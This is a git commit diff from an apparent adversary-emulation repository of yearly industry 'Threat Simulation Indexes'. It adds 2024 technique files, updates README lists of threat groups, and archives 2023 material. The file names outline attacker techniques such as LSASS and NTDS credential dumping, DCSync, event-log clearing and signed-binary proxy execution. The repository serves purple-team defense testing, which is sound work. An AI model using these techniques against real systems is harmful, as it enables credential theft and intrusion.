 create mode 100644 h-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml
 create mode 100644 h-index-2024/techniques/Persistence/0bcb2080-b140-4a1c-9e79-8512a18882d8.yml
 create mode 100644 h-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml
 create mode 100644 h-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml
 create mode 100644 h-index-2024/techniques/Persistence/5dc3f424-8f31-49ee-a822-a77ce20bac43.yml
 create mode 100644 h-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml
 create mode 100644 h-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml
 create mode 100644 ot-index-2024/CHANGELOG.md
 create mode 100644 ot-index-2024/REQUIREMENTS.md
 create mode 100644 ot-index-2024/ot-index-2024-v1.0-layer.json
 create mode 100644 ot-index-2024/ot-index-2024-v1.0-notebook.md
 create mode 100644 ot-index-2024/ot-index-2024-v1.0-summary.csv
 create mode 100644 ot-index-2024/ot-index-2024-v1.0.yml
 create mode 100644 ot-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml
 create mode 100644 ot-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml
 create mode 100644 ot-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml
 create mode 100644 ot-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml
 create mode 100644 ot-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml
 create mode 100644 ot-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml
 create mode 100644 ot-index-2024/techniques/CredentialAccess/08efdcab-54e0-4e06-8f72-b72f23e4fcab.yml
 create mode 100644 ot-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml
 create mode 100644 ot-index-2024/techniques/CredentialAccess/6efcb4c5-d740-41ce-a0dc-b63734813928.yml
 create mode 100644 ot-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml
 create mode 100644 ot-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml
 create mode 100644 ot-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml
 create mode 100644 ot-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml
 create mode 100644 ot-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml
 create mode 100644 ot-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml
 create mode 100644 ot-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml
 create mode 100644 ot-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml
 create mode 100644 ot-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml
 create mode 100644 ot-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml
 create mode 100644 ot-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml
 create mode 100644 ot-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml
 create mode 100644 ot-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml
 create mode 100644 ot-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml
 create mode 100644 ot-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml
 create mode 100644 ot-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml
 create mode 100644 ot-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml
 create mode 100644 ot-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml
 create mode 100644 ot-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml
 create mode 100644 ot-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml
 create mode 100644 ot-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml
 create mode 100644 ot-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml
 create mode 100644 ot-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml
 create mode 100644 ot-index-2024/techniques/Impact/99c34e6d-c82a-48b8-88ea-7453f98ee561.yml
 create mode 100644 ot-index-2024/techniques/InitialAccess/0a348365-1f35-445c-baf0-a6687ddc3f40.yml
 create mode 100644 ot-index-2024/techniques/InitialAccess/98551e7e-1cb8-47c0-a27d-772ddd700617.yml
 create mode 100644 ot-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml
 create mode 100644 ot-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml
 create mode 100644 ot-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml
 create mode 100644 ot-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml
 create mode 100644 ot-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml
 create mode 100644 ot-index-2024/techniques/OT/0abf446d-3422-4b78-a029-a3485be7be2f.yml
 create mode 100644 ot-index-2024/techniques/OT/3ac5c6b7-aa22-4359-9506-c675391c8b63.yml
 create mode 100644 ot-index-2024/techniques/OT/594e3a9f-82c9-4c99-a535-9379d69d2c3b.yml
 create mode 100644 ot-index-2024/techniques/OT/6652690f-4b0d-4677-90b9-6a4fe3282ed4.yml
 create mode 100644 ot-index-2024/techniques/OT/85c528ae-0337-45c8-a413-41d59a67b924.yml
 create mode 100644 ot-index-2024/techniques/OT/9b542d39-29c9-4659-9756-6813426ff41b.yml
 create mode 100644 ot-index-2024/techniques/OT/b7cefb21-5835-478e-8541-b09d15c11948.yml
 create mode 100644 ot-index-2024/techniques/OT/db4921c6-c8e6-4bcf-b4b3-dc97f6257608.yml
 create mode 100644 ot-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml
 create mode 100644 ot-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml
 create mode 100644 ot-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml
 create mode 100644 ot-index-2024/techniques/Persistence/5dc3f424-8f31-49ee-a822-a77ce20bac43.yml
 create mode 100644 ot-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml
 create mode 100644 ot-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml
 create mode 100644 rh-index-2024/CHANGELOG.md
 create mode 100644 rh-index-2024/REQUIREMENTS.md
 create mode 100644 rh-index-2024/rh-index-2024-v1.0-layer.json
 create mode 100644 rh-index-2024/rh-index-2024-v1.0-notebook.md
 create mode 100644 rh-index-2024/rh-index-2024-v1.0-summary.csv
 create mode 100644 rh-index-2024/rh-index-2024-v1.0.yml
 create mode 100644 rh-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml
 create mode 100644 rh-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml
 create mode 100644 rh-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml
 create mode 100644 rh-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml
 create mode 100644 rh-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml
 create mode 100644 rh-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml
 create mode 100644 rh-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml
 create mode 100644 rh-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml
 create mode 100644 rh-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml
 create mode 100644 rh-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml
 create mode 100644 rh-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml
 create mode 100644 rh-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml
 create mode 100644 rh-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml
 create mode 100644 rh-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml
 create mode 100644 rh-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml
 create mode 100644 rh-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml
 create mode 100644 rh-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml
 create mode 100644 rh-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml
 create mode 100644 rh-index-2024/techniques/DefenseEvasion/9dbfedcf-893f-4086-b428-2f3bc73c96a5.yml
 create mode 100644 rh-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml
 create mode 100644 rh-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml
 create mode 100644 rh-index-2024/techniques/Discovery/3f120c23-78c0-462f-808f-38ef4f607233.yml
 create mode 100644 rh-index-2024/techniques/Discovery/4266c26e-0470-4b97-8dc3-1d24fe35f586.yml
 create mode 100644 rh-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml
 create mode 100644 rh-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml
 create mode 100644 rh-index-2024/techniques/Discovery/9064e91a-be78-48a5-9112-28d5701d6d51.yml
 create mode 100644 rh-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml
 create mode 100644 rh-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml
 create mode 100644 rh-index-2024/techniques/Exfiltration/11b7a86e-4596-4df9-a2a9-705096756d28.yml
 create mode 100644 rh-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml
 create mode 100644 rh-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml
 create mode 100644 rh-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml
 create mode 100644 rh-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml
 create mode 100644 rh-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml
 create mode 100644 rh-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml
 create mode 100644 rh-index-2024/techniques/InitialAccess/1f9d5363-ddf4-41c3-8bc3-f80595219206.yml
 create mode 100644 rh-index-2024/techniques/InitialAccess/609515fe-24e0-4bc2-a069-a3d815e68ec2.yml
 create mode 100644 rh-index-2024/techniques/InitialAccess/97f1da56-79a3-4181-a491-8de9f93b05af.yml
 create mode 100644 rh-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml
 create mode 100644 rh-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml
 create mode 100644 rh-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml
 create mode 100644 rh-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml
 create mode 100644 rh-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml
 create mode 100644 rh-index-2024/techniques/LateralMovement/b74ff4c5-eebf-466b-af85-341b19c4c748.yml
 create mode 100644 rh-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml
 create mode 100644 rh-index-2024/techniques/Persistence/0bcb2080-b140-4a1c-9e79-8512a18882d8.yml
 create mode 100644 rh-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml
 create mode 100644 rh-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml
 create mode 100644 rh-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml
 create mode 100644 rh-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml

diff --git a/README.md b/README.md
index 3cd0ada..57f0f6f 100644
--- a/README.md
+++ b/README.md
@@ -8,13 +8,14 @@ One of the goals of each Threat Simulation Index is to allow organizations to co
 
 Indexes are released once per year. Throughout the year, an Index may receive minor quality of life changes but will not deviate significantly from the initial release. New yearly releases start fresh and are not designed to be compatible with previous releases. Overlap between Indexes in the same industry for different years is incidental, as is overlap across industries.
 
-## 2023 Indexes
+## 2024 Indexes
 
-The following Indexes are available for 2023:
+The following Indexes are available for 2024:
 
-- [Financial Services](fs-index-2023/)
-- [Retail & Hospitality](rh-index-2023/)
-- [Health](h-index-2023/)
+- [Financial Services](fs-index-2024/)
+- [Retail & Hospitality](rh-index-2024/)
+- [Health](h-index-2024/)
+- [OT](ot-index-2024/)
 
 ### Composition
 
@@ -25,32 +26,44 @@ Expand the below section to view Index group compositions
 
 **Financial Services**
 
-- [APT28](https://attack.mitre.org/groups/G0007/)
-- [APT29](https://attack.mitre.org/groups/G0016/)
+- [Scattered Spider](https://attack.mitre.org/groups/G1015/)
+- LockBit
+- [ALPHV](https://attack.mitre.org/software/S1068/)
+- [Clop](https://attack.mitre.org/software/S0611)
+- [Lazarus](https://attack.mitre.org/groups/G0032/)
 - [APT41](https://attack.mitre.org/groups/G0096/)
-- [Bazar](https://attack.mitre.org/software/S0534/)
-- [Bumblebee](https://attack.mitre.org/software/S1039/) (& Quantum)
-- [LAPSUS$](https://attack.mitre.org/groups/G1004/)
-- [QakBot](https://attack.mitre.org/software/S0650/)
+- SocGholish
+
 
 **Retail & Hospitality**
 
-- [APT41](https://attack.mitre.org/groups/G0096/)
-- [Conti](https://attack.mitre.org/software/S0575/)
-- [Bumblebee](https://attack.mitre.org/software/S1039/) (& Quantum)
-- [FIN7](https://attack.mitre.org/groups/G0046/)
-- [LAPSUS$](https://attack.mitre.org/groups/G1004/)
-- [QakBot](https://attack.mitre.org/software/S0650/)
+- BianLian
+- [Scattered Spider](https://attack.mitre.org/groups/G1015/)
+- LockBit
+- [ALPHV](https://attack.mitre.org/software/S1068/)
+- [Clop](https://attack.mitre.org/software/S0611)
 
 **Health**
 
+- [Scattered Spider](https://attack.mitre.org/groups/G1015/)
+- LockBit
+- [ALPHV](https://attack.mitre.org/software/S1068/)
+- [Clop](https://attack.mitre.org/software/S0611)
 - [APT41](https://attack.mitre.org/groups/G0096/)
-- [Bazar](https://attack.mitre.org/software/S0534/)
-- [BlackTech](https://attack.mitre.org/groups/G0098/)
-- [Bumblebee](https://attack.mitre.org/software/S1039/) (& Quantum)
-- [Conti](https://attack.mitre.org/software/S0575/)
-- [Kimsuky](https://attack.mitre.org/groups/G0094/)
-- [QakBot](https://attack.mitre.org/software/S0650/)
+- SocGholish
+- [Mustang Panda](https://attack.mitre.org/groups/G0129/)
+- Dark Angels
+- BianLian
+
+**OT**
+
+- [Scattered Spider](https://attack.mitre.org/groups/G1015/)
+- LockBit
+- [ALPHV](https://attack.mitre.org/software/S1068/)
+- [Lazarus](https://attack.mitre.org/groups/G0032/)
+- [Mustang Panda](https://attack.mitre.org/groups/G0129/)
+- Dark Angels
+- [Sandworm](https://attack.mitre.org/groups/G0034)
 
 </details>
 
@@ -72,13 +85,12 @@ Indexes can be imported directly into [VECTR](https://vectr.io) using the merged
 
 Test cases are based on MITRE-tracked intelligence and the general process for determining test cases for inclusion is as follows:
 
-1. Identify initial list of groups with principal members
-2. Map groups to MITRE-tracked groups and filter out non-MITRE groups
-3. Review intelligence report for each group
-    1. Remove anything produced before the look-back period of two years
+1. Identify initial list of groups and TTPs with principal members
+2. Collect then review intelligence report for each group
+    1. Remove anything produced before the look-back period of one year
     2. Remove reports that do not provide enough information for simulation purposes
     3. Cut groups lacking intelligence
-4. Extract TTP information from intelligence reports then develop full test cases for each
+3. Extract TTP information from intelligence reports then develop full test cases for each
     1. Exclude TTPs that likely do not act as worthwhile simulation candidates
-5. Filter out items from list to balance plan composition
+4. Filter out items from list to balance plan composition
 
diff --git a/archived/2023/README.md b/archived/2023/README.md
new file mode 100644
index 0000000..3cd0ada
--- /dev/null
+++ b/archived/2023/README.md
@@ -0,0 +1,84 @@
+# Threat Simulation Indexes
+
+Each Threat Simulation Index is a curated list of test cases derived from the threat groups of interest for members of a given industry using MITRE-tracked intelligence. Security Risk Advisors (SRA) collaborates with experts in threat intelligence and cyber defense at targeted organizations to identify priorities for defense testing.  
+
+One of the goals of each Threat Simulation Index is to allow organizations to compare objective defense scores against peers. Visit the [Defense Success Metric blog post on SRA.io](https://sra.io/blog/the-road-to-benchmarked-mitre-attck-alignment-defense-success-metrics/) for more information.
+
+### Release Cycle
+
+Indexes are released once per year. Throughout the year, an Index may receive minor quality of life changes but will not deviate significantly from the initial release. New yearly releases start fresh and are not designed to be compatible with previous releases. Overlap between Indexes in the same industry for different years is incidental, as is overlap across industries.
+
+## 2023 Indexes
+
+The following Indexes are available for 2023:
+
+- [Financial Services](fs-index-2023/)
+- [Retail & Hospitality](rh-index-2023/)
+- [Health](h-index-2023/)
+
+### Composition
+
+Expand the below section to view Index group compositions
+
+<details>
+  <summary>Expand</summary>
+
+**Financial Services**
+
+- [APT28](https://attack.mitre.org/groups/G0007/)
+- [APT29](https://attack.mitre.org/groups/G0016/)
+- [APT41](https://attack.mitre.org/groups/G0096/)
+- [Bazar](https://attack.mitre.org/software/S0534/)
+- [Bumblebee](https://attack.mitre.org/software/S1039/) (& Quantum)
+- [LAPSUS$](https://attack.mitre.org/groups/G1004/)
+- [QakBot](https://attack.mitre.org/software/S0650/)
+
+**Retail & Hospitality**
+
+- [APT41](https://attack.mitre.org/groups/G0096/)
+- [Conti](https://attack.mitre.org/software/S0575/)
+- [Bumblebee](https://attack.mitre.org/software/S1039/) (& Quantum)
+- [FIN7](https://attack.mitre.org/groups/G0046/)
+- [LAPSUS$](https://attack.mitre.org/groups/G1004/)
+- [QakBot](https://attack.mitre.org/software/S0650/)
+
+**Health**
+
+- [APT41](https://attack.mitre.org/groups/G0096/)
+- [Bazar](https://attack.mitre.org/software/S0534/)
+- [BlackTech](https://attack.mitre.org/groups/G0098/)
+- [Bumblebee](https://attack.mitre.org/software/S1039/) (& Quantum)
+- [Conti](https://attack.mitre.org/software/S0575/)
+- [Kimsuky](https://attack.mitre.org/groups/G0094/)
+- [QakBot](https://attack.mitre.org/software/S0650/)
+
+</details>
+
+## Intent & Use
+
+Indexes are designed to be used by human operators as part of simulated attack scenarios such as purple teams. Operators should have general familiarity with attacker techniques, payload generation, and infrastructure management.
+
+Individual Index requirements can be found in that Index's folder in the REQUIREMENTS.md file.
+
+Indexes can be imported directly into [VECTR](https://vectr.io) using the merged YAML document for that Index.
+
+### Additional Notes
+
+- Operators are free to use their payload generation procedures of choice as long as the resulting payload(s) complies with the general description provided by the test case and its associated documentation.
+- Where possible, Operators should avoid using default settings for their tools. This includes, but is not limited to: shellcode, C2 traffic signatures, and default artifacts
+- Some test cases can be performed through alternative execution methods. However, Operators should exercise caution in methods that produce significantly different detection artifacts for the core behaviors. For example, executing a .NET payload via an `execute-assembly` style harness is generally acceptable whereas substituting one credential dumping method for another should be avoided.
+
+## Development Process
+
+Test cases are based on MITRE-tracked intelligence and the general process for determining test cases for inclusion is as follows:
+
+1. Identify initial list of groups with principal members
+2. Map groups to MITRE-tracked groups and filter out non-MITRE groups
+3. Review intelligence report for each group
+    1. Remove anything produced before the look-back period of two years
+    2. Remove reports that do not provide enough information for simulation purposes
+    3. Cut groups lacking intelligence
+4. Extract TTP information from intelligence reports then develop full test cases for each
+    1. Exclude TTPs that likely do not act as worthwhile simulation candidates
+5. Filter out items from list to balance plan composition
+
diff --git a/fs-index-2023/CHANGELOG.md b/archived/2023/fs-index-2023/CHANGELOG.md
similarity index 100%
rename from fs-index-2023/CHANGELOG.md
rename to archived/2023/fs-index-2023/CHANGELOG.md
diff --git a/fs-index-2023/NOTEBOOK.md b/archived/2023/fs-index-2023/NOTEBOOK.md
similarity index 100%
rename from fs-index-2023/NOTEBOOK.md
rename to archived/2023/fs-index-2023/NOTEBOOK.md
diff --git a/fs-index-2023/REQUIREMENTS.md b/archived/2023/fs-index-2023/REQUIREMENTS.md
similarity index 100%
rename from fs-index-2023/REQUIREMENTS.md
rename to archived/2023/fs-index-2023/REQUIREMENTS.md
diff --git a/fs-index-2023/fs-index-2023-v1.2-summary.csv b/archived/2023/fs-index-2023/fs-index-2023-v1.2-summary.csv
similarity index 100%
rename from fs-index-2023/fs-index-2023-v1.2-summary.csv
rename to archived/2023/fs-index-2023/fs-index-2023-v1.2-summary.csv
diff --git a/fs-index-2023/fs-index-2023-v1.2.yml b/archived/2023/fs-index-2023/fs-index-2023-v1.2.yml
similarity index 100%
rename from fs-index-2023/fs-index-2023-v1.2.yml
rename to archived/2023/fs-index-2023/fs-index-2023-v1.2.yml
diff --git a/fs-index-2023/navigator.json b/archived/2023/fs-index-2023/navigator.json
similarity index 100%
rename from fs-index-2023/navigator.json
rename to archived/2023/fs-index-2023/navigator.json
diff --git a/fs-index-2023/techniques/Collection/T1560.001_7zip_v1.yml b/archived/2023/fs-index-2023/techniques/Collection/T1560.001_7zip_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/Collection/T1560.001_7zip_v1.yml
rename to archived/2023/fs-index-2023/techniques/Collection/T1560.001_7zip_v1.yml
diff --git a/fs-index-2023/techniques/CommandandControl/T1071.001_httpc2_v3.yml b/archived/2023/fs-index-2023/techniques/CommandandControl/T1071.001_httpc2_v3.yml
similarity index 100%
rename from fs-index-2023/techniques/CommandandControl/T1071.001_httpc2_v3.yml
rename to archived/2023/fs-index-2023/techniques/CommandandControl/T1071.001_httpc2_v3.yml
diff --git a/fs-index-2023/techniques/CommandandControl/T1071.001_httpsc2_v3.yml b/archived/2023/fs-index-2023/techniques/CommandandControl/T1071.001_httpsc2_v3.yml
similarity index 100%
rename from fs-index-2023/techniques/CommandandControl/T1071.001_httpsc2_v3.yml
rename to archived/2023/fs-index-2023/techniques/CommandandControl/T1071.001_httpsc2_v3.yml
diff --git a/fs-index-2023/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml b/archived/2023/fs-index-2023/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml
similarity index 100%
rename from fs-index-2023/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml
rename to archived/2023/fs-index-2023/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml
diff --git a/fs-index-2023/techniques/CommandandControl/T1102.002_webservicec2_v3.yml b/archived/2023/fs-index-2023/techniques/CommandandControl/T1102.002_webservicec2_v3.yml
similarity index 100%
rename from fs-index-2023/techniques/CommandandControl/T1102.002_webservicec2_v3.yml
rename to archived/2023/fs-index-2023/techniques/CommandandControl/T1102.002_webservicec2_v3.yml
diff --git a/fs-index-2023/techniques/CommandandControl/T1105_certutil_v2.yml b/archived/2023/fs-index-2023/techniques/CommandandControl/T1105_certutil_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/CommandandControl/T1105_certutil_v2.yml
rename to archived/2023/fs-index-2023/techniques/CommandandControl/T1105_certutil_v2.yml
diff --git a/fs-index-2023/techniques/CommandandControl/T1105_tooldownload_v2.yml b/archived/2023/fs-index-2023/techniques/CommandandControl/T1105_tooldownload_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/CommandandControl/T1105_tooldownload_v2.yml
rename to archived/2023/fs-index-2023/techniques/CommandandControl/T1105_tooldownload_v2.yml
diff --git a/fs-index-2023/techniques/CommandandControl/T1219_remote_assist_v1.yml b/archived/2023/fs-index-2023/techniques/CommandandControl/T1219_remote_assist_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/CommandandControl/T1219_remote_assist_v1.yml
rename to archived/2023/fs-index-2023/techniques/CommandandControl/T1219_remote_assist_v1.yml
diff --git a/fs-index-2023/techniques/CommandandControl/T1572_personalvpn_v1.yml b/archived/2023/fs-index-2023/techniques/CommandandControl/T1572_personalvpn_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/CommandandControl/T1572_personalvpn_v1.yml
rename to archived/2023/fs-index-2023/techniques/CommandandControl/T1572_personalvpn_v1.yml
diff --git a/fs-index-2023/techniques/CredentialAccess/T1003.001_comsvcs_v1.yml b/archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.001_comsvcs_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/CredentialAccess/T1003.001_comsvcs_v1.yml
rename to archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.001_comsvcs_v1.yml
diff --git a/fs-index-2023/techniques/CredentialAccess/T1003.001_procdump_v2.yml b/archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.001_procdump_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/CredentialAccess/T1003.001_procdump_v2.yml
rename to archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.001_procdump_v2.yml
diff --git a/fs-index-2023/techniques/CredentialAccess/T1003.001_taskmgr_v1.yml b/archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.001_taskmgr_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/CredentialAccess/T1003.001_taskmgr_v1.yml
rename to archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.001_taskmgr_v1.yml
diff --git a/fs-index-2023/techniques/CredentialAccess/T1003.002_reg_save_all_v1.yml b/archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.002_reg_save_all_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/CredentialAccess/T1003.002_reg_save_all_v1.yml
rename to archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.002_reg_save_all_v1.yml
diff --git a/fs-index-2023/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml b/archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml
similarity index 100%
rename from fs-index-2023/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml
rename to archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml
diff --git a/fs-index-2023/techniques/CredentialAccess/T1003.003_ntdsutil_v2.yml b/archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.003_ntdsutil_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/CredentialAccess/T1003.003_ntdsutil_v2.yml
rename to archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.003_ntdsutil_v2.yml
diff --git a/fs-index-2023/techniques/CredentialAccess/T1003.006_dcsync_v2.yml b/archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.006_dcsync_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/CredentialAccess/T1003.006_dcsync_v2.yml
rename to archived/2023/fs-index-2023/techniques/CredentialAccess/T1003.006_dcsync_v2.yml
diff --git a/fs-index-2023/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml b/archived/2023/fs-index-2023/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml
rename to archived/2023/fs-index-2023/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml
diff --git a/fs-index-2023/techniques/DefenseEvasion/T1070.001_cleareventlog_v2.yml b/archived/2023/fs-index-2023/techniques/DefenseEvasion/T1070.001_cleareventlog_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/DefenseEvasion/T1070.001_cleareventlog_v2.yml
rename to archived/2023/fs-index-2023/techniques/DefenseEvasion/T1070.001_cleareventlog_v2.yml
diff --git a/fs-index-2023/techniques/DefenseEvasion/T1218.005_mshta_v2.yml b/archived/2023/fs-index-2023/techniques/DefenseEvasion/T1218.005_mshta_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/DefenseEvasion/T1218.005_mshta_v2.yml
rename to archived/2023/fs-index-2023/techniques/DefenseEvasion/T1218.005_mshta_v2.yml
diff --git a/fs-index-2023/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml b/archived/2023/fs-index-2023/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml
similarity index 100%
rename from fs-index-2023/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml
rename to archived/2023/fs-index-2023/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml
diff --git a/fs-index-2023/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml b/archived/2023/fs-index-2023/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml
similarity index 100%
rename from fs-index-2023/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml
rename to archived/2023/fs-index-2023/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml
